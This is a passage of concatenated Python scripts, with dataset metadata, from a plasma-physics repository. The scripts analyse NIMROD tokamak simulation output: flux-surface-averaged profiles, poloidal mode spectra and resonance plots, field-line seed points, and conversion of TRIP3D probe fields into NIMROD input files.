\\\n fargs=fargs)\n\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n #unevaluated interpoate\n self.qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic')\n #second call to fsa is to calcualte b_ms ans psi_mn\n neq=2+self.nfour*(4*self.mmax+1)\n dvar,yvar,contours = cfsa.FSA(cevalnimrod, rzo, self.surfmn_int, neq, \\\n nsurf=nsurf,depvar='eta', dpow=0.5,rzx=rzx,flag=eqflag,normalize=False,\\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n\n psimn=np.zeros([self.nfour,2*self.mmax+1,iend])\n psicmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n psismn=np.zeros([self.nfour,2*self.mmax+1,iend])\n for ii in range(self.nfour):\n oset = ii * (4*self.mmax+1)\n psicmn[ii,:,:]= yvar[2+oset:2*self.mmax+3+oset,:iend]*(np.pi*2.0)\n psismn[ii,0:self.mmax,:]=\\\n yvar[3+2*self.mmax+oset:3+3*self.mmax+oset,:iend]*(np.pi*2.0)\n 
psismn[ii,self.mmax+1:2*self.mmax+1,:]=\\\n yvar[3+3*self.mmax+oset:3+4*self.mmax+oset,:iend]*(np.pi*2.0)\n psimn=np.sqrt(np.square(psicmn)+np.square(psismn))\n\n s_surfmn = yvar[1,:iend]*np.pi*2\n \n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n #dvars\n self.psin=interp1d(dvar[1,:iend], dvar[0,:iend], kind='cubic')(self.rhon)\n self.psi=interp1d(dvar[1,:iend], dvar[2,:iend], kind='cubic')(self.rhon)\n self.vprime=np.pi*2*interp1d(dvar[1,:iend], dvar[6,:iend], kind='cubic')(self.rhon)\n self.q=interp1d(dvar[1,:iend], dvar[7,:iend], kind='cubic')(self.rhon)\n\n self.psicmn=interp1d(dvar[1,:iend],psicmn, kind='cubic')(self.rhon)\n self.psismn=interp1d(dvar[1,:iend],psismn, kind='cubic')(self.rhon)\n self.psimn =interp1d(dvar[1,:iend],psimn , kind='cubic')(self.rhon)\n\n self.s_surfmn = interp1d(dvar[1,:iend],s_surfmn, kind='cubic')(self.rhon)\n self.calc_surfmn = True\n\n def get_resonance(self,nn,mm,b_flag=\"psi\"):\n ''' Evaluate the resonant component of a b or psi at the given q=m/n'''\n if nn<1:\n print(\"nn must be positive by convention in get_resonance\")\n raise ValueError\n ndex=nn-1 #todo check\n mdex=self.get_m_index(mm)\n if ndex==None:\n print(f\"{nn} is not a n number in surfmn file\")\n raise ValueError\n if mdex==None:\n print(f\"{mm} is not an m number in surfmn file\")\n raise ValueError\n qres=mm/nn\n if b_flag==\"psi\":\n resfield=interp1d(self.rhon,self.psimn[ndex,mdex,:])\n elif b_flag==\"bmn\":\n if self.calc_surfmn==False:\n raise ValueError(\"Can not calculate b_mn, no S_surfmn\")\n else:\n resfield=interp1d(self.rhon,self.psimn[ndex,mdex,:]/self.s_surfmn*2e4)\n else:\n raise ValueError(\"b_flag not reconized\")\n\n return resfield(self.get_rho_q(qres))\n\n def get_phase(self,nn,mm,):\n ''' Evaluate the phase of psi at the given resonces'''\n if self.phasemn is None: self.compute_phase()\n if nn<1:\n print(\"nn must be positive by convention in get_phase\")\n raise ValueError\n ndex=nn-1 #todo check\n mdex=self.get_m_index(mm)\n if ndex==None:\n print(f\"{nn} is not a n number in surfmn file\")\n raise ValueError\n if mdex==None:\n print(f\"{mm} is not an m number in surfmn file\")\n raise ValueError\n qres=mm/nn\n return interp1d(self.rhon,self.phasemn[ndex,mdex,:])(self.get_rho_q(qres))\n\n def plot(self,pargs={}):\n if \"field\" in pargs:\n field=pargs[\"field\"]\n else:\n field='p'\n qmin = np.amin(self.q)\n qmax = np.amax(self.q)\n if (qmin < 0.0 and qmax < 0.0):\n self.signq = -1\n elif (qmin > 0.0 and qmax > 0.0):\n self.signq = +1\n else:\n self.signq = None\n if field=='b':\n if self.calc_surfmn==True:\n for im,imode in enumerate(self.ifour):\n self.plot_radial_bmn(im,imode,pargs)\n self.plot_surfmn_bmn(im,imode,pargs)\n else:\n print(\"S no caluted\")\n raise ValueError\n else: \n for im,imode in enumerate(self.ifour):\n self.plot_radial(im,imode,pargs)\n self.plot_surfmn(im,imode,pargs)\n\n def plot_radial(self,ii,imode,pargs={}):\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n if abs(self.time - 0.0005413792981815724) < 1.0e-6:\n title=f\"Peak Pulse (0.5ms)\\n $\\psi$(n={int(imode)})\"\n elif abs(self.time - 0.00500030382482843) < 1.0e-6:\n title=f\"Early Slow Growth (5ms)\\n $\\psi$(n={int(imode)})\"\n elif abs(self.time - 0.002969027824826107) < 1.0e-6:\n title=f\"Earlier in Time (3ms)\\n $\\psi$(n={int(imode)})\"\n elif abs(self.time - 0.008385763824834448) < 1.0e-6:\n title=f\"Late Slow Growth (8ms)\\n $\\psi$(n={int(imode)})\"\n else:\n 
title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n ylabel=f\"$\\psi_m$ [mWb]\"\n colorlist = list(mcolors.TABLEAU_COLORS)\n xlabel=r'$\\rho_N$'\n fontsize=24\n legendfont=20\n if imode==1:\n if self.signq == -1:\n mlist=range(-4,0)#mlist=range(-4,1)\n else:\n mlist=range(0,4)#mlist=range(-4,1)\n elif imode==2:\n mlist=range(-6,-1)\n else:\n mstart=-2*imode\n mlist=range(mstart,mstart+imode+1)\n if 'mlists' in pargs:\n if ii<len(pargs['mlists'][ii]):\n mlist=pargs['mlists'][ii]\n rhomax=np.max(self.rhon)\n for im,this_m in enumerate(mlist):\n this_i = self.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(abs(this_m))\n tc=colorlist[im%len(colorlist)]\n ax.plot(self.rhon/rhomax,self.psimn[ii,this_i,:]*1000, color=tc, label=mlbl)\n try:\n qlist=pargs['qlists'][ii]\n except:\n if imode==1:\n if self.signq == -1:\n qlist=range(-4,-1)\n else:\n qlist=range(1,5)\n elif imode==2:\n qlist=[-4,-3,-2.5,-2,-1.5]\n elif imode==3:\n qlist=[-3,-2.33, -2,-1.67,-1.33]\n elif imode==4:\n qlist=[-3,-2,-1.75,-1.5,-1.25]\n elif imode==5:\n qlist=[-3,-2,-1.8,-1.6,-1.4,-1.2]\n else:\n qlist=[-4,-3,-2]\n print(qlist)\n print(pargs)\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {abs(qq):.1f}\"\n tc=colorlist[iq]\n # if (qq in [-3,-2]): #aps/paper\n # ax.axvline(irho/rhomax,ls=':',color=tc, label=qlbl)\n #if (qq in [-3,-2]):\n ax.axvline(irho/rhomax,ls=':',color=tc, label=qlbl)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0,\n frameon=True,\n fontsize=legendfont,\n ncol=1,\n handlelength=1,\n handletextpad=0.4)\n plt.title(title,fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n plt.ylabel(ylabel,fontsize=fontsize)\n plt.tight_layout()\n plt.show()\n \n def plot_radial_bmn(self,ii,imode,pargs={}):\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n title=f\"$B$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n title=f\"$B$(n={int(imode)})\"\n ylabel=f\"$B_r$ [G]\"\n colorlist = list(mcolors.TABLEAU_COLORS)\n xlabel=r'$\\rho_N$'\n fontsize=24\n legendfont=20\n if imode==1:\n if self.signq == -1:\n mlist=range(-4,0)\n else:\n mlist=range(1,5)\n elif imode==2:\n mlist=range(-6,-1)\n else:\n mstart=-2*imode\n mlist=range(mstart,mstart+imode+1)\n if 'mlists' in pargs:\n if ii<len(pargs['mlists'][ii]):\n mlist=pargs['mlists'][ii]\n rhomax=np.max(self.rhon)\n for im,this_m in enumerate(mlist):\n this_i = self.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(abs(this_m))\n tc=colorlist[im%len(colorlist)]\n ax.plot(self.rhon / rhomax,\n 2 * self.psimn[ii,this_i,:] / np.abs(self.s_surfmn) * 10000,\n color=tc,\n label=mlbl)\n try:\n qlist=pargs['qlists'][ii]\n except:\n if imode==1:\n if self.signq == -1:\n qlist=range(-4,-1)\n else:\n qlist=range(2,5)\n elif imode==2:\n qlist=[-4,-3,-2.5,-2,-1.5]\n elif imode==3:\n qlist=[-3,-2.33, -2,-1.67,-1.33]\n elif imode==4:\n qlist=[-3,-2,-1.75,-1.5,-1.25]\n elif imode==5:\n qlist=[-3,-2,-1.8,-1.6,-1.4,-1.2]\n else:\n qlist=[-4,-3,-2]\n print(qlist)\n print(pargs)\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {abs(qq):.1f}\"\n tc=colorlist[iq]\n if qq in [2,-2]:\n tc = colorlist[2]\n if qq in [3,-3]:\n tc = colorlist[3]\n if qq in [4,-4]:\n tc = colorlist[4]\n # if (qq in [-3,-2]): #aps/paper\n # ax.axvline(irho/rhomax,ls=':',color=tc, label=qlbl)\n #if (qq in [-3,-2]):\n #ax.axvline(irho/rhomax,ls=':',color=tc, label=qlbl)\n ax.axvline(irho/rhomax,ls=':',color=tc)\n except:\n print(f\"q={qq:.2f} is 
not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0,\n frameon=True,\n fontsize=legendfont,\n ncol=1,\n handlelength=1,\n handletextpad=0.4)\n plt.title(title,fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n plt.ylabel(ylabel,fontsize=fontsize)\n plt.tight_layout()\n plt.show()\n\n\n def plot_surfmn(self,im,imode,surfmn,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n # Set titles and labels\n title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n # set contour levels, i could generalize this further if needed\n levels=301\n vmax=np.amax(self.psimn[im,:,:])*1000\n levels=np.linspace(0,vmax,301)\n cbar_ticks=np.linspace(0,vmax,11)\n # Update plot based on keys in kwargs\n xlabel=\"Poloidal Mode Number m\"\n fontsize=18\n # set up mrange()\n qmin=np.amin(self.q)\n qmax=np.amax(self.q)\n mrange=np.linspace(qmin,qmax)\n #create the surfmn plot\n plt.set_cmap('nipy_spectral')\n m=range(-self.mmax,self.mmax+1)\n rhomax=np.max(self.rhon)\n mv, rv = np.meshgrid(m, self.rhon/rhomax, sparse=False, indexing='ij')\n conf=plt.contourf(mv,rv,np.clip(self.psimn[im,:,:]*1000,0,None),levels=levels,vmax=vmax)\n plt.plot(imode*mrange,self.get_rho_q(mrange)/rhomax,c='w')\n plt.title(title,fontsize=fontsize)\n plt.ylabel(r'$\\rho_N$',fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n plt.xlim(-self.mmax,self.mmax)\n plt.show()\n\n def plot_surfmn_bmn(self,im,imode,surfmn,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n # Set titles and labels\n title=f\"$B_r$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n title=f\"$B_r$(n={int(imode)}) [G]\"\n # set contour levels, i could generalize this further if needed\n levels=301\n vmax=2 * np.amax(self.psimn[im,:,:] / np.abs(self.s_surfmn))*10000\n #vmax=4.2\n #vmax=4.8\n levels=np.linspace(0,vmax,301)\n cbar_ticks=np.linspace(0,vmax,11)\n # Update plot based on keys in kwargs\n xlabel=\"Poloidal Mode Number m\"\n fontsize=18\n # set up mrange()\n qmin=np.amin(self.q)\n qmax=np.amax(self.q)\n mrange=np.linspace(qmin,qmax)\n #create the surfmn plot\n plt.set_cmap('nipy_spectral')\n m=range(-self.mmax,self.mmax+1)\n psimax=np.max(self.psi)\n mv, rv = np.meshgrid(m, self.psi/psimax, sparse=False, indexing='ij')\n conf=plt.contourf(mv,\n rv,\n np.clip(2 * self.psimn[im,:,:] / np.abs(self.s_surfmn) * 10000, 0, None),\n levels=levels,\n vmax=vmax)\n plt.plot(imode*mrange,self.get_psi_q(mrange)/psimax,c='w')\n #plt.plot(imode*mrange+1,self.get_psi_q(mrange)/psimax,c='k',ls='--')\n plt.plot(imode*mrange+2,self.get_psi_q(mrange)/psimax,c='r',ls='-.')\n #plt.plot(imode*mrange+3,self.get_psi_q(mrange)/psimax,c='k',ls=':')\n plt.title(title,fontsize=fontsize)\n plt.ylabel(r'$\\psi_N$',fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n plt.xlim(-self.mmax,self.mmax)\n plt.show()\n\n def get_dumptime(self):\n ''' Open the hdf5 dumpfile read the dump time and dumpstep '''\n with h5py.File(self.dumpfile, 'r') as h5file:\n try:\n self.time=h5file[\"dumpTime\"].attrs['vsTime']\n self.step=int(h5file[\"dumpTime\"].attrs['vsStep'])\n except:\n print(f\"Error reading time or step in {self.dumpfile}\")\n raise\n" }, { "alpha_fraction": 0.4447077512741089, "alphanum_fraction": 0.5221168994903564, "avg_line_length": 29.14285659790039, "blob_id": "b7f69b74b75f2d31a7b07ea9b3e48313f0a0b95d", "content_id": "ac2fff17249923a330b22bd973676f408d49cccb", "detected_licenses": [], "is_generated": false, "is_vendor": 
false, "language": "Python", "length_bytes": 1266, "license_type": "no_license", "max_line_length": 63, "num_lines": 42, "path": "/nimflSeed/divSeed.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport numpy as np\nimport itertools as iter\nimport random as ran\n\nSEGMENTS = [\n ((1.016, 0.000), (1.016,-1.223)),\n ((1.016,-1.223), (1.153,-1.363)),\n ((1.153,-1.363), (1.372,-1.363)),\n ((1.372,-1.250), (1.682,-1.250))\n]\n\ndef write_start(file_name, xy, phi):\n npts = xy.shape[0] * phi.shape[0]\n with open(file_name,'w') as thisFile:\n thisFile.write(str(npts)+\"\\n\")\n for [r,z],p in iter.product(xy,phi):\n thisLine = '{: 16.16e}'.format(r) + \", \"\n thisLine+= '{: 16.16e}'.format(z) + \", \"\n thisLine+= '{: 16.16e}'.format(p) + \"\\n\"\n thisFile.write(thisLine)\n\ndef div_seed():\n nphi = 360\n nl = 100\n dtan = 0.01\n BASENAME = \"start_positions.dat\"\n counter = 0\n for segment in SEGMENTS:\n start = np.array(segment[0])\n end = np.array(segment[1])\n tan = np.array([-end[1] + start[1], end[0] - start[0]])\n length = np.linalg.norm(tan)\n tan = dtan/length * tan\n l_arr = np.linspace(start,end,nl)\n l_arr = l_arr + tan\n phi = np.linspace(0, 2*np.pi, nphi)\n file_name = BASENAME + f\"_{counter}\"\n write_start(file_name, l_arr, phi)\n counter += 1\nif __name__ == \"__main__\":\n div_seed()\n" }, { "alpha_fraction": 0.6062063574790955, "alphanum_fraction": 0.6381691098213196, "avg_line_length": 33.65053939819336, "blob_id": "b0b5ba8454d7a7224259e0aa7568a6ea0b8c966a", "content_id": "82c3dda26351d9c72c4a91cbc59a61fa7e266d9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6445, "license_type": "no_license", "max_line_length": 87, "num_lines": 186, "path": "/surfmn/profiles.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#profiles is a class for calculating 1D profiles\n# using the flux surface integration\n#\n#\nimport f90nml\nfrom eval_nimrod import *\nfrom field_class import *\nfrom fsa import *\nimport matplotlib.pyplot as pl\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline\nimport os\nimport h5py\nimport sys\nimport numpy as np\nimport pickle\n\nclass Profiles:\n def __init__(self,dumpfile,nimrodin):\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.setprofiles=False\n self.psin=np.empty([1])\n self.psi=np.empty([1])\n self.rhon=np.empty([1])\n self.bigr=np.empty([1])\n self.nd=np.empty([1])\n self.p=np.empty([1])\n self.pe=np.empty([1])\n self.ti=np.empty([1])\n self.te=np.empty([1])\n self.q=np.empty([1])\n self.jpar=np.empty([1])\n self.kpol=np.empty([1])\n self.omegator=np.empty([1])\n self.vprime=np.empty([1])\n self.f=np.empty([1])\n self.invr2=np.empty([1])\n def dump(self,file):\n pickle.dump(self.dumpfile,file)\n pickle.dump(self.nimrodin,file)\n pickle.dump(self.setprofiles,file)\n if self.setprofiles==True:\n pickle.dump(self.psin,file)\n pickle.dump(self.psi,file)\n pickle.dump(self.rhon,file)\n pickle.dump(self.bigr,file)\n pickle.dump(self.nd,file)\n pickle.dump(self.p,file)\n pickle.dump(self.pe,file)\n pickle.dump(self.ti,file)\n pickle.dump(self.te,file)\n pickle.dump(self.q,file)\n pickle.dump(self.jpar,file)\n pickle.dump(self.kpol,file)\n pickle.dump(self.omegator,file)\n pickle.dump(self.vprime,file)\n pickle.dump(self.f,file)\n pickle.dump(self.invr2,file)\n def load(self,file):\n self.dumpfile=pickle.load(file)\n print(self.dumpfile)\n 
self.nimrodin=pickle.load(file)\n print(self.nimrodin)\n self.setprofiles=pickle.load(file)\n print(self.setprofiles)\n if self.setprofiles==True:\n self.psin=pickle.load(file)\n self.psi=pickle.load(file)\n self.rhon=pickle.load(file)\n self.bigr=pickle.load(file)\n self.nd=pickle.load(file)\n self.p=pickle.load(file)\n self.pe=pickle.load(file)\n self.ti=pickle.load(file)\n self.te=pickle.load(file)\n self.q=pickle.load(file)\n self.jpar=pickle.load(file)\n self.kpol=pickle.load(file)\n self.omegator=pickle.load(file)\n self.vprime=pickle.load(file)\n self.f=pickle.load(file)\n self.invr2=pickle.load(file)\n def fsaint(self,rzc,dy,evalnimrod,isurf):\n '''\n Integrand for fluxsurface integration\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth\n dy(3)=dq\n '''\n n0 = np.array(evalnimrod.eval_field('n',rzc,dmode=0,eq=3))\n v0 = np.array(evalnimrod.eval_field('v', rzc, dmode=0, eq=3)) #eq + n0\n p0 = np.array(evalnimrod.eval_field('p',rzc,dmode=0,eq=3))\n pe0 = np.array(evalnimrod.eval_field('pe',rzc,dmode=0,eq=3))\n ti0 = np.array(evalnimrod.eval_field('ti',rzc,dmode=0,eq=3))\n te0 = np.array(evalnimrod.eval_field('te',rzc,dmode=0,eq=3))\n b0 = np.array(evalnimrod.eval_field('b', rzc, dmode=0, eq=3))\n j0 = np.array(evalnimrod.eval_field('j',rzc,dmode=0,eq=3))\n\n # set up useful working variables\n modbp = np.sqrt(np.dot(b0[0:2],b0[0:2]))\n modb=np.sqrt(np.dot(b0,b0))\n jpar=np.dot(j0,b0)/modb #\n\n _small = 1.0e-12\n #update integrands\n dy[4]=n0*dy[2]\n dy[5]=np.dot(v0[0:2],b0[0:2])*dy[2]/max(modbp**2,_small)#Kpol\n dy[6]=v0[2]*dy[2]/rzc[0] #omega_t\n dy[7]=p0*dy[2] #p0\n dy[8]=pe0*dy[2] #pe\n dy[9]=ti0*dy[2] #ti\n dy[10]=te0*dy[2]#te\n dy[11]=jpar*dy[2] #jpar\n dy[12]=rzc[0]*b0[2]*dy[2] #F\n dy[13]=dy[2]/rzc[0]**2 #1/R^2\n #update bigr\n self.bigr[isurf]=max(self.bigr[isurf],rzc[0])\n return dy\n\n def get_omega_exb(self, n, rhon=None):\n omega_exb=n*(4*np.pi**2*self.q*self.kpol/self.vprime-self.omegator)\n if rhon==None:\n return omega_exb\n return interp1d(self.rhon, omega_exb, kind='cubic')(rhon)\n\n def get_rho_q(self,q):\n try:\n return interp1d(self.q,self.rhon, kind='cubic',fill_value=\"extrapolate\")(q)\n except:\n print(f\"The safety factor {q} is not it the domain\")\n raise\n\n def get_field_rho(self,field,rhon):\n try:\n return interp1d(self.rhon,field, kind='cubic')(rhon)\n except:\n print(f\"Problem evaluitng field at rhon={rhon}\")\n raise\n\n def calculate(self,rzo=None,rzx=None,**kwargs):\n mi=kwargs.get(\"mi\",3.3435860e-27)\n qe=kwargs.get(\"qe\",1.609e-19)\n nsurf=kwargs.get(\"nsurf\",150)\n\n self.setprofiles=True\n self.bigr=np.full([nsurf],-np.inf,dtype=np.float64)\n\n evalnimrod=EvalNimrod(self.dumpfile,fieldlist='nvptbj')\n dvar, yvar, contours = FSA(evalnimrod, rzo, self.fsaint, 10, nsurf=nsurf, \\\n depvar='eta', dpow=0.5, rzx=rzx,normalize=True)\n\n iend=-1\n temp = np.where(yvar[0,:]==np.nan)\n print(temp)\n for ix,ivar in enumerate(yvar[0,:]):\n print(ix,ivar)\n print(np.isnan(yvar[:,:iend]).any())\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n #dvars\n tempbigr=np.copy(self.bigr)\n self.psin=interp1d(dvar[1,:iend], dvar[0,:iend], kind='cubic')(self.rhon)\n self.psi=interp1d(dvar[1,:iend], dvar[2,:iend], kind='cubic')(self.rhon)\n self.bigr=interp1d(dvar[1,:iend], tempbigr[:iend], kind='cubic')(self.rhon)\n 
self.vprime=np.pi*2*interp1d(dvar[1,:iend], dvar[6,:iend], kind='cubic')(self.rhon)\n self.q=interp1d(dvar[1,:iend], dvar[7,:iend], kind='cubic')(self.rhon)\n\n # yvars\n self.nd=interp1d(dvar[1,:iend], yvar[0,:iend], kind='cubic')(self.rhon)\n self.kpol=interp1d(dvar[1,:iend], yvar[1,:iend], kind='cubic')(self.rhon)\n self.omegator=interp1d(dvar[1,:iend], yvar[2,:iend], kind='cubic')(self.rhon)\n self.p=interp1d(dvar[1,:iend], yvar[3,:iend], kind='cubic')(self.rhon)\n self.pe=interp1d(dvar[1,:iend], yvar[4,:iend], kind='cubic')(self.rhon)\n self.ti=interp1d(dvar[1,:iend], yvar[5,:iend], kind='cubic')(self.rhon)\n self.te=interp1d(dvar[1,:iend], yvar[6,:iend], kind='cubic')(self.rhon)\n self.jpar=interp1d(dvar[1,:iend], yvar[7,:iend], kind='cubic')(self.rhon)\n self.f=interp1d(dvar[1,:iend], yvar[8,:iend], kind='cubic')(self.rhon)\n self.invr2=interp1d(dvar[1,:iend], yvar[9,:iend], kind='cubic')(self.rhon)\n" }, { "alpha_fraction": 0.6527494788169861, "alphanum_fraction": 0.7622199654579163, "avg_line_length": 36.075469970703125, "blob_id": "c16e7c3180974626ccf535eac11eeb8e33be8cb6", "content_id": "d60b3fa9bdd387211af66cb8168f04bf4240a2b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1964, "license_type": "no_license", "max_line_length": 81, "num_lines": 53, "path": "/trip2Nim/tripToNim.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' This script reads the external magnetic fields from trip3D output files\n and converts that data to a formate readible by NIMROD '''\n\nimport sys\nsys.path.insert(0, \"./\")\nimport os\nimport tripClass as tc\n\nhomeDir = os.environ['HOME']\n\nreadDirectory = homeDir + \"/SCRATCH/166439/03300_2_equilbria/19091201_probeg/\"\n\n#writeDirectory = homeDir + \"/SCRATCH/testingjunk/\"\n#writeDirectory = homeDir + \"/SCRATCH/166439/03300_vac_eq/normal_rmp/\"\nwriteDirectory = homeDir + \"/SCRATCH/166439/03300_2_equilbria/19091201_probeg/\"\nreadDirectory = homeDir + \"/SCRATCH/166439/03300_2_equilbria/19100401_probe_gb/\"\nwriteDirectory = homeDir + \"/SCRATCH/166439/03300_2_equilbria/19100401_probe_gb/\"\n\nreadDirectory = homeDir + \"/SCRATCH/KSTAR/19118_2800ms/22032403_probeg/\"\nwriteDirectory = homeDir + \"/SCRATCH/KSTAR/19118_2800ms/22032403_rmp_v1/\"\n\nreadDirectory = homeDir + \"/SCRATCH/KSTAR/19118_2950_C1wall/22052401_brmp/\"\nwriteDirectory = homeDir + \"/SCRATCH/KSTAR/19118_2950_C1wall/22052401_brmp/\"\n\nreadDirectory = homeDir + \"/SCRATCH/KSTAR/19118_2950_C1wall/22062201_probeg/\"\nwriteDirectory = homeDir + \"/SCRATCH/KSTAR/19118_2950_C1wall/22062201_brmp/\"\n\nshotNumber = \"166439\"\ntimeSlice = \"03300\"\n\nrzFileSuffix = \"probe.points.rz.in\"\naFileSuffix = \"probe_ga.out\"\nbFileSuffix = \"probe_gb.out\"\n\nnimrodRmpFile = \"brmpn\"\nnimrodRmpSuffix = \".dat\"\n\nrzProbeFile = readDirectory + shotNumber + \".\" + timeSlice + \".\" + rzFileSuffix\naProbeFile = readDirectory + shotNumber + \".\" + timeSlice + \".\" + aFileSuffix\nbProbeFile = readDirectory + shotNumber + \".\" + timeSlice + \".\" + bFileSuffix\n\nrzProbeFile = readDirectory + rzFileSuffix\naProbeFile = readDirectory + aFileSuffix\nbProbeFile = readDirectory + bFileSuffix\n\nindexShift=0 #was 5\ncomplexCon = True\n\ntripData = tc.TripClass(rzProbeFile,aProbeFile,bProbeFile,indexShift,complexCon)\ntripData.processBFile()\nprint(tripData.brPhase[0,:])\ntripData.writeNimrodBext(writeDirectory,nimrodRmpFile,nimrodRmpSuffix)" }, { "alpha_fraction": 
0.5698172450065613, "alphanum_fraction": 0.600371241569519, "avg_line_length": 31.88262939453125, "blob_id": "a426f30315e353359dbbe07dd3877b75c12ed62d", "content_id": "6fb16dc9c7e7e2aaf5da6b5af4b7c5621e04b7d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14008, "license_type": "no_license", "max_line_length": 90, "num_lines": 426, "path": "/ntmscripts/ntm_step.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#profiles is a class for calculating 1D profiles\n# using the flux surface integration\n#\n#\nimport f90nml\nimport eval_comp_nimrod as ceval\n#from field_class import *\nimport comp_fsa as cfsa\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline,griddata\nimport os\nimport h5py\nimport sys\nimport numpy as np\nimport pickle\n\nclass ntmstep:\n def __init__(self,dumpfile,nimrodin):\n #start with dump file and nimrod.in info\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.time=None\n self.step=None\n # next include info on how fsa's were performed\n self.mmax=None\n self.ifour=[]\n self.nfour=None\n self.setprofiles=False\n #finally end with the profiles\n self.psin=np.empty([1])\n self.psi=np.empty([1])\n self.rhon=np.empty([1])\n self.q=np.empty([1])\n self.qpsi=np.empty([1])\n self.vprime=np.empty([1])\n self.bmn=np.empty([1])\n self.bcmn=np.empty([1])\n self.bsmn=np.empty([1])\n def dump(self,file):\n pickle.dump(self.dumpfile,file)\n pickle.dump(self.nimrodin,file)\n pickle.dump(self.time,file)\n pickle.dump(self.step,file)\n # next include info on how fsa's were performed\n pickle.dump(self.mmax,file)\n pickle.dump(self.ifour,file)\n pickle.dump(self.nfour,file)\n pickle.dump(self.setprofiles,file)\n #finally end with the profiles\n if self.setprofiles==True:\n pickle.dump(self.psin,file)\n pickle.dump(self.psi,file)\n pickle.dump(self.rhon,file)\n pickle.dump(self.q,file)\n pickle.dump(self.vprime,file)\n pickle.dump(self.bmn,file)\n pickle.dump(self.bcmn,file)\n pickle.dump(self.bsmn,file)\n def load(self,file):\n self.dumpfile=pickle.load(file)\n self.nimrodin=pickle.load(file)\n self.time=pickle.load(file)\n self.step=pickle.load(file)\n # next include info on how fsa's were performed\n self.mmax=pickle.load(file)\n self.ifour=pickle.load(file)\n self.nfour=pickle.load(file)\n self.setprofiles=pickle.load(file)\n #finally end with the profiles\n if self.setprofiles==True:\n self.psin=pickle.load(file)\n self.psi=pickle.load(file)\n self.rhon=pickle.load(file)\n self.q=pickle.load(file)\n self.vprime=pickle.load(file)\n self.bmn=pickle.load(file)\n self.bcmn=pickle.load(file)\n self.bsmn=pickle.load(file)\n\n def get_m_index(self,m):\n '''Return the index for the given m\n Return None if m is out of range'''\n if self.mmax==None:\n write(\"mmax has not be set in get_m_index\")\n raise\n else:\n if m>self.mmax:\n return None\n elif m<-1*self.mmax:\n return None\n else:\n return m+self.mmax\n def dummy_fsa(self,rzc,y,dy,evalnimrod,flag,fargs):\n '''\n Dummy integrand for complex fsa, this is used to get v' and q\n without running a true fsa\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth :v'\n dy(3)=dq: q\n '''\n dy[4]=1.0\n return dy\n\n def surfmn_int(self,rzc,y,dy,evalnimrod,flag,fargs):\n '''\n Integrand for fluxsurface integration\n Flux surface averge quantities (f/bdgrth where 
